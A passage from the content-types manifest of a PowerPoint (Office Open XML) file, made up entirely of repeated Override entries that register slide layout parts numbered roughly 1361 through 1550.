  <Override PartName="/ppt/slideLayouts/slideLayout1361.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1362.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1363.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1364.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1365.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1366.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1367.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1368.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1369.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout137.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1370.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1371.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1372.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1373.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1374.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1375.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1376.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1377.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1378.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1379.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout138.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1380.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1381.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1382.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1383.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1384.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1385.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1386.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1387.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1388.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1389.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout139.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1390.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1391.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1392.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1393.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1394.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1395.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1396.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1397.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1398.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1399.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout14.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout140.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1400.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1401.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1402.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1403.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1404.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1405.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1406.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1407.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1408.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1409.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout141.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1410.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1411.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1412.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1413.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1414.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1415.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1416.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1417.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1418.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1419.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout142.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1420.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1421.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1422.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1423.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1424.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1425.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1426.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1427.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1428.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1429.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout143.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1430.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1431.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1432.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1433.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1434.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1435.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1436.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1437.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1438.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1439.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout144.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1440.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1441.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1442.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1443.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1444.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1445.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1446.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1447.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1448.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1449.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout145.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1450.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1451.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1452.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1453.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1454.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1455.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1456.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1457.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1458.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1459.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout146.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1460.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1461.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1462.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1463.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1464.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1465.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1466.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1467.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1468.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1469.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout147.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1470.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1471.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1472.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1473.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1474.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1475.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1476.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1477.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1478.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1479.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout148.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1480.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1481.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1482.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1483.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1484.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1485.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1486.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1487.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1488.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1489.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout149.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1490.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1491.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1492.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1493.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1494.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1495.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1496.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1497.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1498.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1499.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout15.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout150.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1500.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1501.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1502.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1503.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1504.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1505.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1506.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1507.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1508.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1509.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout151.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1510.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1511.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1512.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1513.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1514.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1515.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1516.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1517.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1518.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1519.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout152.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1520.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1521.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1522.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1523.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1524.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1525.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1526.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1527.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1528.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1529.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout153.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1530.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1531.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1532.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1533.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1534.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1535.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1536.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1537.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1538.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1539.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout154.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1540.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1541.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1542.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1543.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1544.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1545.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1546.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1547.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1548.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1549.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout155.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1550.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
